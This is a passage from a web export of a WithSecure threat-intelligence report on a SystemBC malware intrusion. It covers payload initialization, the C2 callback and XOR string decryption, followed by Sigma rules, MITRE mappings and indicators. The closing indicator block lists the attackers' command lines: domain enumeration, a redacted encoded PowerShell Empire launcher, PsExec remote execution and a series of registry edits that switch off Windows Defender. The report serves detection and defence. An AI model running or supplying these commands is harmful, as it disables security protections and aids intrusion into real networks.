Other file types will be executed via a scheduled task, using the same COM interface that is used for its own persistence.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/34.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 19: Execution Flow<\/p>\n<h3>SystemBC: A new variant?<\/h3>\n<p>The sample analyzed by WithSecure also had significant differences from those previously analyzed. The SystemBC payload was smaller than previous 2020 versions, with the size of the unpacked payload being just 28 KB as opposed to the TOR version, which is 44 KB. The new version lacked previously observed features such as the TOR client, AV search and binary relocation on disk. The following sections explore those differences in more detail.<\/p>\n<h2>Initialization<\/h2>\n<p>When the SystemBC payload WithSecure analyzed is executed, it will search for and create a mutex \u201cwow64\u201d. Then it calls sub_402985 to check if the passed command line argument equals \u201cstart\u201d. If the mutex was not found and the file was executed with \u201cstart\u201d, it will continue to sub_401549 to execute the C2 commands.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/35.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 20: Initialization Function (New Version)<\/p>\n<p>In the older version of SystemBC, the name of the process is used as a mutex. The initialization is fairly similar to the new sample, with a few differences. The old sample will attempt to find the a2guard.exe process, which is linked to an anti-virus product belonging to Emsisoft. If the process is found, the sample will exit without establishing persistence. 
If the \u201cstart\u201d argument is missing, the file will be copied into a random directory under ProgramData.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/36.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 21: Initialization Function (Old Version)<\/p>\n<p>In both samples, if the \u201cstart\u201d argument is missing, a scheduled task will be created from the disk image with the \u201cstart\u201d argument.<\/p>\n<h3>C2 Callback<\/h3>\n<p>Before SystemBC calls the C2 server, it will collect some basic information from the host:<\/p>\n<ul>\n<li>Username<\/li>\n<li>The Windows build number for the infected system<\/li>\n<li>A WOW process check (32-bit or 64-bit detection)<\/li>\n<li>The volume serial number<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/37.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 22: RtlGetVersion and IsWow64Process APIs Runtime Resolution (New Version)<\/p>\n<p>In the older version, which has TOR capabilities, the sample implements a small TOR client that, according to Sophos, is likely a C implementation of the open source <a href=\"https:\/\/github.com\/wbenny\/mini-tor\/\" target=\"_blank\" rel=\"noopener\">mini-tor<\/a>, which is written in C++. The C2 communications are then routed via TOR.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/38.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 23: C2 Code (Old Version)<\/p>\n<p>The newer sample lacks the TOR client code completely, and its C2 communications are implemented with sockets over the IPv4 TCP protocol on non-standard ports. 
The XOR routine is called to decrypt the required port number from the .data section inside the binary.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/39.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 24: Call WSAStartup and Decrypt Port Number (New Version)<\/p>\n<p>The malware then continues with the C2 connection, decrypting the IP address with the same XOR function as well as building the required parameters to make a network connection.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/40.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 25: C2 IP Decryption &amp; Socket Creation (New Version)<\/p>\n<h3>XOR<\/h3>\n<p>Interestingly, throughout both the old and new samples, the XOR decryption function at offset 0x2C07 is called multiple times for different strings loaded from the memory of the process. The decryption function checks the boundaries of the start of the decryption key and the end of the encrypted data section to determine whether a passed string is located inside them and therefore requires decryption or not.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/41.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 26: Decryptor Function<\/p>\n<p>This could suggest that there is support for further obfuscation in SystemBC by encrypting more of the plaintext strings. The XOR decryption key used is 40 bytes long and located at the beginning of the .data section at 0x5000. The C2 details are located immediately after the key.<\/p>\n<p>This kind of XOR function and configuration have been observed in even <a href=\"https:\/\/twitter.com\/VK_Intel\/status\/1123880277170892800\" target=\"_blank\" rel=\"noopener\">older samples from 2019<\/a>. 
The new sample analyzed is very similar to previously observed samples in terms of capability, but as discussed above has a different implementation for initialization and C2. The earliest sample of this SystemBC version was observed at the beginning of January 2021.<\/p>\n<h2>Indicators &amp; Detection<\/h2>\n<h3>Detection<\/h3>\n<p>The table below contains the offensive techniques mentioned within this report mapped to the open source detection framework <a href=\"https:\/\/github.com\/SigmaHQ\/sigma\" target=\"_blank\" rel=\"noopener\">Sigma<\/a>. This framework allows the conversion of detection logic into many formats for use across a wide range of industry detection tooling. A fidelity rating is included within the rules to provide guidance on how to implement these rules within internal scoring and alerting systems.<\/p>\n<p>n.b. &#8211; The fidelity rating may vary dependent on the specifics of your environment<\/p>\n<p>Detection ContextSIGMA RuleFidelityPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_powershell_empire_launch.yml\" target=\"_blank\" rel=\"noopener\">Empire PowerShell Launch Parameters<\/a>HighPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/powershell\/powershell_suspicious_invocation_generic.yml\" target=\"_blank\" rel=\"noopener\">Suspicious PowerShell Invocations &#8211; Generic<\/a>HighPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_powershell_suspicious_parameter_variation.yml\" target=\"_blank\" rel=\"noopener\">Suspicious PowerShell Parameter Substring<\/a> High PowerShell Empire C2 Traffic<a 
href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/proxy\/proxy_empire_ua_uri_combos.yml\" target=\"_blank\" rel=\"noopener\">Empire UserAgent URI Combo<\/a>HighNtdsutil Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_ntdsutil.yml\" target=\"_blank\" rel=\"noopener\">Invocation of Active Directory Diagnostic Tool<\/a>High PsExec Lateral Movement<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/other\/win_tool_psexec.yml\" target=\"_blank\" rel=\"noopener\">PsExec Tool Execution<\/a>High PsExec Lateral Movement <a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_psexesvc_start.yml\" target=\"_blank\" rel=\"noopener\">PsExec Service Start<\/a>HighMalicious Script Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/malware\/av_relevant_files.yml\" target=\"_blank\" rel=\"noopener\">Antivirus Relevant File Paths Alerts<\/a>HighComsvcs LSASS Dump<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_process_dump_rundll32_comsvcs.yml\" target=\"_blank\" rel=\"noopener\">Process Dump via Rundll32 and Comsvcs.dll<\/a>HighDisabling Windows Defender<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/other\/win_defender_disabled.yml\" target=\"_blank\" rel=\"noopener\">Windows Defender Threat Detection Disabled<\/a>HighNltest Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_trust_discovery.yml\" target=\"_blank\" rel=\"noopener\">Domain Trust Discovery<\/a>Medium Advanced IP Scanner 
Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_advanced_ip_scanner.yml\" target=\"_blank\" rel=\"noopener\">Advanced IP Scanner<\/a>MediumNET.exe Domain Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_recon_activity.yml\" target=\"_blank\" rel=\"noopener\">Suspicious Reconnaissance Activity<\/a>MediumNET.exe Local Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_local_system_owner_account_discovery.yml\" target=\"_blank\" rel=\"noopener\">Local Accounts Discovery<\/a>LowQuick Network Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_multiple_suspicious_cli.yml\" target=\"_blank\" rel=\"noopener\">Quick Execution of a Series of Suspicious Commands<\/a>Low<\/p>\n<h3>MITRE ATT&amp;CK<\/h3>\n<p>TacticTechniqueTechnique ID Initial Access  External Remote Services<a href=\"https:\/\/attack.mitre.org\/techniques\/T1133\/\" target=\"_blank\" rel=\"noopener\">T1133<\/a>Valid Accounts: Domain Accounts<a href=\"https:\/\/attack.mitre.org\/techniques\/T1078\/002\/\" target=\"_blank\" rel=\"noopener\">T1078.002<\/a> Trusted Relationship  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1199\/\" target=\"_blank\" rel=\"noopener\">T1199<\/a>Execution Command &amp; Scripting Interpreter: PowerShell<a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/001\/\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a>Command &amp; Scripting Interpreter: Windows Command Shell<a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/003\/\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a> Inter-Process Communication: Component Object Model  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1559\/001\/\" 
target=\"_blank\" rel=\"noopener\">T1559.001<\/a> Native API <a href=\"https:\/\/attack.mitre.org\/techniques\/T1106\/\" target=\"_blank\" rel=\"noopener\">T1106<\/a>Persistence  Scheduled Task\/Job: Scheduled Task <a href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/005\/\" target=\"_blank\" rel=\"noopener\">T1053.005<\/a>Defense Evasion  Obfuscated Files or Information: Software Packing  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/002\/\" target=\"_blank\" rel=\"noopener\">T1027.002<\/a> Process Injection: Portable Executable Injection  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/002\/\" target=\"_blank\" rel=\"noopener\">T1055.002<\/a> Process Injection: Process Hollowing   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/012\/\" target=\"_blank\" rel=\"noopener\">T1055.012<\/a>  Deobfuscate\/Decode Files or Information <a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\" target=\"_blank\" rel=\"noopener\">T1140<\/a>  Impair Defenses: Disable or Modify Tools<a href=\"https:\/\/attack.mitre.org\/techniques\/T1562\/001\/\" target=\"_blank\" rel=\"noopener\">T1562.001<\/a>Credential Access Exploitation for Credential Access  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1212\/\" target=\"_blank\" rel=\"noopener\">T1212<\/a>  OS Credential Dumping: LSASS Memory<a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\" target=\"_blank\" rel=\"noopener\">T1003.001<\/a> OS Credential Dumping: NTDS  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/003\/\" target=\"_blank\" rel=\"noopener\">T1003.003<\/a> Discovery        Account Discovery: Domain Account<a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/002\/\" target=\"_blank\" rel=\"noopener\">T1087.002<\/a> Domain Trust Discovery   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1482\/\" target=\"_blank\" rel=\"noopener\">T1482<\/a> Network Service Scanning   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1046\/\" target=\"_blank\" 
rel=\"noopener\">T1046<\/a>  Network Share Discovery<a href=\"https:\/\/attack.mitre.org\/techniques\/T1135\/\" target=\"_blank\" rel=\"noopener\">T1135<\/a>  Permission Groups Discovery: Domain Groups<a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\" target=\"_blank\" rel=\"noopener\">T1069.002<\/a>  Remote System Discovery <a href=\"https:\/\/attack.mitre.org\/techniques\/T1018\/\" target=\"_blank\" rel=\"noopener\">T1018<\/a> System Information Discovery<a href=\"https:\/\/attack.mitre.org\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a> Lateral Movement Lateral Tool Transfer<a href=\"https:\/\/attack.mitre.org\/techniques\/T1570\/\" target=\"_blank\" rel=\"noopener\">T1570<\/a> Remote Services: Remote Desktop Protocol  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1021\/001\/\" target=\"_blank\" rel=\"noopener\">T1021.001<\/a> Remote Services: SMB\/Windows Admin Shares  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1021\/002\/\" target=\"_blank\" rel=\"noopener\">T1021.002<\/a>Command and Control Application Layer Protocol: Web Protocols  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1071\/001\/\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a> Non-Standard Port   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1571\/\" target=\"_blank\" rel=\"noopener\">T1571<\/a><\/p>\n<h3>Files<\/h3>\n<p>File NameContextSHA256a.ps1Enumeration ScriptB953F255F799D43131FAAB437C22B883B0903704328D58F9AE8111066D7AA1E41.ps1LSASS Dumper03960062388E8068143FB6CAE203DA2954C3A43BE3306D0D326F015A14019EFFservers0.batPsexec Execution Script890F5323E870C49C412EECD0417D8E1F22D7FFDB8AED11FAE0810383D7C42B91svchost.exeSystemBC Malware2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580<\/p>\n<h3>IP Addresses<\/h3>\n<p>IP AddressContextLast Observed193.29.104[.]187PowerShell Empire2021-02-2779.110.52[.]9SystemBC2021-02-2723.227.202[.]22SystemBC2021-02-27<\/p>\n<h3>URLs<\/h3>\n<p>URLLast 
ObservedhXXps:\/\/fs12n1.sendspace[.]com\/dl\/ 2dcbf9eb9e28920a81febd3f0a8cda84\/ 6039c40226878d2e\/px2kd3\/1.rar2021-02-27hXXps:\/\/fs12n5.sendspace[.]com\/dl\/ 5593c4325c0f9c23cb59661893ae9454\/ 6039c46105fab7d4\/3dugcw\/2.zip2021-02-27<\/p>\n<h3>Malicious Command Lines<\/h3>\n<pre><code class=\"language-bash\">Enumeration:\nping.exe     &lt;hostname&gt;\nnet.exe     group &quot;domain computers&quot; \/domain\nnet.exe     group &quot;domain admins&quot; \/domain\nnet.exe     group &quot;enterprise admins&quot; \/domain\nnet.exe     user &lt;USER&gt; \/domain\nnet1.exe     group &quot;domain computers&quot; \/domain\nnet1.exe     group &quot;domain admins&quot; \/domain\nnet1.exe     group &quot;enterprise admins&quot; \/domain\nnet1.exe     user &lt;USER&gt; \/domain\nnltest.exe \/dclist:\nnltest.exe \/dclist:&lt;DOMAIN&gt;\n\nExecution:\nadvanced_ip_scanner.exe     \/portable &quot;C:\/Users\/&lt;USER&gt;\/Downloads\/&quot; \/lng en_us\npowershell.exe     \npowershell.exe     -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJA&lt;REDACTED&gt;\niexplore.exe     http:\/\/www.advanced-ip-scanner.com\/link.php?lng=en&amp;ver=2-5-3850&amp;beta=n&amp;page=help\ncmd.exe     \/C &quot;C:\\s$\\Servers0.bat&quot;\npsexec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nC:\\Users\\Public\\Music\\svchost.exe start\n\nDefensive Evasion:\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine&quot; \/v MpEnablePus \/t REG_DWORD \/d 0 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v 
DisableBehaviorMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableIOAVProtection \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableOnAccessProtection \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRealtimeMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRoutinelyTakingAction \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableScanOnRealtimeEnable \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting&quot; \/v DisableEnhancedNotifications \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v DisableBlockAtFirstSeen \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SpynetReporting \/t REG_DWORD \/d 0 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SubmitSamplesConsent \/t REG_DWORD \/d 2 \/f\nreg.exe     delete &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/f<\/code><\/pre>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p 
xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>Sami Ruohonen<br \/>\nContent<\/p>\n<p>Introduction<br \/>\nIntrusion Technical Detail<br \/>\nWrapper<br \/>\nSystemBC Payload<br \/>\nInitialization<br \/>\nIndicators &#038; Detection<br \/>\nShare this story<\/p>\n<p>Introduction<br \/>\nIn late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. <\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[330,215,312],"labs_content_type":[320],"class_list":["post-10474","lab_item","type-lab_item","status-publish","hentry","category-endpoint-security","category-ransomware","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, 
(max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Ransomware<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Prelude to Ransomware: SystemBC<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">\nSami Ruohonen\nContent\n\nIntroduction\nIntrusion Technical Detail\nWrapper\nSystemBC Payload\nInitialization\nIndicators &amp; Detection\nShare this story\n\nIntroduction\nIn late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. 
<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10474","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10474"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10474"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10474"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}